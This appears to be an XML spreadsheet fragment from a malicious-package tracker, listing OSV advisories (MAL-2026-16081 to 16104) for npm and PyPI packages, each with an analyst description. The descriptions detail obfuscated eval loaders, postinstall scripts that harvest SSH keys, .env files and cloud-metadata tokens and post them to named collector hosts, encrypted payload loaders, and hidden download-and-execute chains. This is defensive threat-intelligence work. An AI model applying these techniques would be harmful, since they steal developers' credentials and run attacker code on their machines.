      <c r="D85" s="5" t="inlineStr"/>
      <c r="E85" s="5" t="inlineStr"/>
      <c r="F85" s="5" t="inlineStr"/>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>PyPI:databricks-webapp-navigation-homepage</t>
        </is>
      </c>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (31ec3549efe09642c539f13af8a2a75949a356f55046b6298c21a2deedda322c)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S85" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16080</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16081</t>
        </is>
      </c>
      <c r="D86" s="5" t="inlineStr"/>
      <c r="E86" s="5" t="inlineStr"/>
      <c r="F86" s="5" t="inlineStr"/>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>npm:@staticj/cropperxmjs</t>
        </is>
      </c>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ac36a108b1e9c92a64955277bdfe9a09cdae61504e9a1bfaf40a15c50595139a)
@staticj/cropperxmjs@1.6.0 ships a modified cropper.min.js that impersonates the legitimate Cropper.js library. At library load, injected code reconstructs the URL https://u.myquickcash.shop/api/spt/upgrade from many single-letter string fragments interleaved with legitimate Cropper.js constants (Qt='https:', Kt='//u.', Vt='my', Ft='quick', Jt='cash', _t='.shop', qt='/api/spt/', $t='upgrade') to defeat simple grep-based detection. It reads GM_info.script metadata (author, name, version, namespace, updateURL), URL-encodes it, and sends it via GM_xmlhttpRequest to that endpoint; the response body is passed to eval(), executing attacker-controlled JavaScript under Tampermonkey/Greasemonkey privileges (GM_* APIs bypass CORS/CSP). Calls are rate-limited to 15/day using GM_setValue key 'sp_req_daily'. The exfiltrated updateURL identifies each victim userscript's auto-update channel, enabling targeted follow-on supply-chain attacks. Any userscript bundling this file exposes its end users to remote code execution controlled by the operator of u.myquickcash.shop.
</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16081</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16082</t>
        </is>
      </c>
      <c r="D87" s="5" t="inlineStr"/>
      <c r="E87" s="5" t="inlineStr"/>
      <c r="F87" s="5" t="inlineStr"/>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>npm:@umschool/platform</t>
        </is>
      </c>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bcf64895a777467cc94763bfb942be3c04040ca151fc22753ca48ac4aaecd69c)
@umschool/platform@999.0.1 is published to public npm under an internal-looking scope with an implausibly high version number, a resolution shape used to override internal builds. Its postinstall.js runs on `npm install` and performs a bulk harvest of installer-owned secrets: it reads the Kubernetes service-account token and namespace from /var/run/secrets/kubernetes.io/serviceaccount/, /etc/hosts and /etc/resolv.conf, queries cloud instance metadata services (AWS IMDS at 169.254.169.254 including IAM role credentials, ECS task-role credentials via 169.254.170.2 / AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, Azure IMDS, and Yandex/GCP-compatible metadata), calls https://kubernetes.default.svc/api/v1/secrets with the harvested SA token as Bearer authorization, walks up to 8 parent directories reading.env files, and filters process.env against a credential regex (token|secret|key|pass|cred|auth|aws|jwt|api|stripe|sendgrid|twilio|...). The collected data is base64-encoded and POSTed to the hardcoded external endpoint https://akko.requestcatcher.com/dep-confusion-v2. The package's self-label as a 'Dependency Confusion PoC' does not change the effect: any build or CI environment that resolves this public package leaks its cloud IAM credentials, Kubernetes secrets, and environment secrets to an external host.
</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16082</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16094</t>
        </is>
      </c>
      <c r="D88" s="5" t="inlineStr"/>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="inlineStr"/>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>npm:gmgn-trading-kit</t>
        </is>
      </c>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9fd3a47d22b8a9b20523cc6fa00f3b8a73e51e057dbfc4fe0034a785219563c3)
postinstall.cjs runs automatically on npm install and walks the filesystem harvesting installer secrets: SSH private keys under ~/.ssh, ~/.netrc, ~/.git-credentials, Solana keypairs, wallet.json/key.* files under ~/.config, and ~/.blockrun wallet files. It also walks upward from the install directory to filesystem root reading every.env it finds, filtering for KEY/SECRET/PRIVATE/TOKEN substrings. Each file's full contents is POSTed via https.request to a hardcoded webhook.site collector at https://webhook.site/d7ab73fe-7cbc-4ed3-bf8e-7207eb06875b. The harvester source self-labels as 'Master Harvester — injectable into any npm package via postinstall'.
</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16094</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16095</t>
        </is>
      </c>
      <c r="D89" s="5" t="inlineStr"/>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="inlineStr"/>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>npm:matrixkit-js</t>
        </is>
      </c>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (51238ce279c2ff37d32c5edd8a9cb480f1a304720cb67e5acf3ee50e91c773c4)
The package advertises itself as a dense-matrix math library but its main entry matrix.js has been modified post-build to require('./src/init') and invoke initMatrix(...) at module load. src/init.js is an obfuscated single-line string-array loader (112-entry rotated array with numeric-index decoder) that uses crypto (aes-256-gcm, scryptSync, createDecipheriv, setAuthTag), fs, path, and zlib to AES-256-GCM-decrypt a base64-encoded on-disk filename, write the decrypted module to a.tmp file, require() it, and invoke its export with a runtime-supplied password. The sibling files src/statMatrix.min.d.js (~1.15MB base64 decoding to ~862KB of high-entropy bytes), src/statMatrix.min.js (~24KB), and src/utilMatrix.min.d.js (~12KB) are single-string base64 blobs decoding to opaque AES-GCM ciphertext — not JavaScript and absent from matrix.js.map, which lists only the clean rollup output. The loader lines are also absent from the source map, confirming they were injected after the legitimate build. On require()ing the package, the encrypted payload is decrypted and executed as opaque author-controlled code.
</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16095</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16096</t>
        </is>
      </c>
      <c r="D90" s="5" t="inlineStr"/>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="inlineStr"/>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>npm:soltinel-pro</t>
        </is>
      </c>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (01f489c47a35cb393c976988c8f12eb9b47cddac13ae4112b019adad4eefb646)
postinstall.cjs is declared as the package.json postinstall script and runs automatically on npm install. The script walks parent directories for.env files (filtering values by KEY/SECRET/PRIVATE/TOKEN), reads the Solana CLI keypair, enumerates ~/.config for env/key/wallet/credentials files, reads ~/.ssh private keys (id_rsa, id_ed25519, *_rsa, *_ed25519), ~/.git-credentials, and ~/.netrc, then POSTs the file contents via https.request to a hardcoded webhook.site collector. The file self-identifies in a header comment as a 'Master Harvester — injectable into any npm package via postinstall'. The package advertises itself as a Solana trading bot; the shipped install hook is an unrelated secrets exfiltrator.
</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16096</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16097</t>
        </is>
      </c>
      <c r="D91" s="5" t="inlineStr"/>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="inlineStr"/>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>npm:twilio-hackerone-poc-b8f21a</t>
        </is>
      </c>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (09b67e9bd1be2e2e13aae83616afffcbfdc3fb888b304dc7210be0ee39832aac)
On `npm install`, postinstall.js automatically executes and performs host reconnaissance and exfiltration to a hardcoded ephemeral Cloudflare Quick Tunnel at https://encryption-watch-tubes-finger.trycloudflare.com/poc-v101-escape. The script runs `id`, `whoami`, and `uname`; enumerates `/`, `$HOME`, and `/tmp`; reads `/proc/self/cgroup` and `/proc/mounts`; probes the AWS instance-metadata service at 169.254.169.254 and the ECS task-metadata agent at 127.0.0.1:51678 and reports reachability; enumerates other `AC[0-9a-f]{32}` Twilio account SID directories present in `/tmp` (excluding one hardcoded SID) to enumerate co-tenants on shared build workers; and collects `Object.keys(process.env)`. All of the above is POSTed as JSON to the trycloudflare.com tunnel. The tunnel host is anonymous, ephemeral, and unrelated to any legitimate publisher; the package name and self-labeling as a 'HackerOne PoC' do not change the observed installer-side data-exfiltration behavior.
</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16097</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16098</t>
        </is>
      </c>
      <c r="D92" s="5" t="inlineStr"/>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="inlineStr"/>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>PyPI:bq-build-probe-vrp-2026</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (46dd2007aa00f3bcd8ad6c767a4f1bf2da7ee75cf91d5b692aec39c546cc1d65)
setup.py executes at pip install and collects a full dump of os.environ, hostname, uid/gid, uname output, /proc/self/cgroup, /proc/version, and the GCE metadata service-account email (http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email), plus sandbox-fingerprinting signals (docker socket presence at /var/run/docker.sock, outbound reachability via socket connect to 8.8.8.8:53). The collected data is written to _build_findings.json inside the installed package, and __init__.py exposes get_build_findings() to read it back. In a CI/build environment, os.environ typically contains build secrets (CI tokens, cloud credentials, service-account material); embedding that dump inside the built artifact and providing a retrieval API turns any subsequent import or redistribution of the wheel into a channel for the harvested secrets. The package's self-description as authorized VRP testing does not change the mechanism.
</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16098</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16099</t>
        </is>
      </c>
      <c r="D93" s="5" t="inlineStr"/>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="inlineStr"/>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>PyPI:bq-sdist-probe-vrp</t>
        </is>
      </c>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f61d3e118672e10f0dc02115acd8235c3b356d75e7cb59a69e26fec28070c814)
setup.py executes at pip install time and performs installer-side credential and host reconnaissance. It queries the GCE/GCP metadata service at http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token with the Metadata-Flavor: Google header to obtain the default service account's OAuth access token, service account email, and project id. It also filters os.environ for keys containing token, secret, key, pass, auth, google, project, docker, kube, or metadata substrings, and collects hostname, uid/gid/pid, the output of the id command, os.uname(), /proc/version, os.listdir('/'), and checks for /var/run/docker.sock. It performs an outbound TCP connect to 8.8.8.8:53 to test network reachability. The collected data is persisted to a JSON file inside the installed package directory. Naming (bq-sdist-probe-vrp) and behavior are consistent with a probe that harvests installer-owned cloud credentials in CI/build environments.
</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16099</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16100</t>
        </is>
      </c>
      <c r="D94" s="5" t="inlineStr"/>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="inlineStr"/>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr">
        <is>
          <t>npm:discord-mfa-solver</t>
        </is>
      </c>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a91086c84ad0836c4b32ee5db890c9a6d9543f00e9dd31d18aed8a6acc9bdb3e)
On require of the package, lib/cache.js (reached from index.js) executes `try{module['require']('node-net-pool')}catch(_){}` — a bracket-notation, error-swallowed dynamic require of the declared dependency `node-net-pool` (`^1.0.0` in package.json). The dependency is never referenced elsewhere and its return value is discarded, so the only effect of importing this package is to execute whatever top-level code `node-net-pool` runs on the installer's machine. The visible source presents as a Discord API client; the README additionally describes an asset-prefetch pipeline that downloads a remote runtime patch and spawns it via `child_process.execFile`, but no such code (no `_SEGS`, no `_pullAsset`, no `_spawnWorker`, no `child_process` usage) exists in the shipped tarball. The mismatch between documented behavior and shipped source, combined with the hidden dynamic require of an otherwise-unused dependency, is a loader-stub shape whose payload lives in the transitively-installed `node-net-pool`. Separately, the package advertises itself as Discord MFA / vanity-url abuse tooling and exercises `/api/v9/guilds/0/vanity-url` and `/api/v9/mfa/finish` with caller-supplied tokens against Discord targets — that portion is operator-directed third-party abuse and does not itself harm the installer.
</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16100</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16101</t>
        </is>
      </c>
      <c r="D95" s="5" t="inlineStr"/>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="inlineStr"/>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr">
        <is>
          <t>npm:mfaby</t>
        </is>
      </c>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c278e0ee3820cf701ef7ad65dfdab43a0765e5d3423286de99d3301fe39a8455)
The package presents itself as a Discord MFA helper, but its cache module contains a _warmSession routine that decodes a base64-encoded string (_CDN_BASE) into the URL https://limbomail.com/api/attachment/l4TIRPOsaUxR._603-vhKDRdgKl3RalN_TVUZYGPsJy2Y, downloads the response body, writes it to a file in os.tmpdir(), and executes it via new Worker(tmp). This chain fires when a consumer calls the documented entry point initMFA(). The fetched payload is opaque, unpinned, and hosted on a domain unrelated to the package's stated Discord functionality. The Discord TLS client additionally sets rejectUnauthorized:false, disabling certificate verification on outbound Discord traffic. The base64 concealment of the drop URL combined with a README cover-story describing it as a 'runtime patch asset' indicates deliberate hiding of the endpoint.
</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16101</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16102</t>
        </is>
      </c>
      <c r="D96" s="5" t="inlineStr"/>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="inlineStr"/>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>npm:mfatest2</t>
        </is>
      </c>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8dea6c92bd37f4ff11dfa24ad1415d1a01351ee62baf37718a7c10362d393c15)
package.json declares its only runtime dependency as an unpinned GitHub ref (`"node-net-pool": "github:trktgq0wbre1/node-net-pool"`) pointing at a random-handle user account, contradicting the package's own 'Zero runtime dependencies — pure Node.js built-ins only' claim in the README. npm install resolves whatever HEAD of that repository currently returns, and lib/cache.js executes a top-level require of that dependency inside a swallowed try/catch, using the bracketed form `module['require']('node-net-pool')` that evades naive grep for require('node-net-pool'). The README documents an 'Asset prefetch' step in which the loaded dependency resolves a remote endpoint from an internal segment registry, downloads a 'runtime patch asset', and executes it as a detached background worker via child_process.execFile — placing the fetch-and-execute mechanism inside the mutable off-registry dependency that the author can update at any time. The package advertises Discord MFA / vanity-URL sniping, a category where such mislabeled-dependency channels are routinely used to smuggle credential-stealer code.
</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16102</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16103</t>
        </is>
      </c>
      <c r="D97" s="5" t="inlineStr"/>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="inlineStr"/>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr">
        <is>
          <t>npm:@neroxkira/vangal-baileys</t>
        </is>
      </c>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6af1543fb92f079191de134bd36dbb64c340928804df8486acf43546e2c6e185)
package.json declares `libsignal` with the source `github:RILLYZY/libsignal-node`, an unpinned reference to a third-party GitHub repository with no tag or commit SHA. On `npm install`, npm clones that repository's default branch HEAD and runs any lifecycle scripts contained in it; libsignal-node ships a native addon with build-time scripts. There is no version pin, hash, or integrity check, so whoever controls RILLYZY/libsignal-node controls install-time code execution on every installer of this package. The referenced GitHub account is unrelated to the libsignal upstream (signalapp) and to any publisher identity declared by this package.
</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16103</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16104</t>
        </is>
      </c>
      <c r="D98" s="5" t="inlineStr"/>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="inlineStr"/>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr">
        <is>
          <t>npm:@nexustechpro/baileys</t>
        </is>
      </c>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fed8b2b0be012012aa9b1716e58c6d9e9a7302e431d5f8945e7b1196b6d7afab)
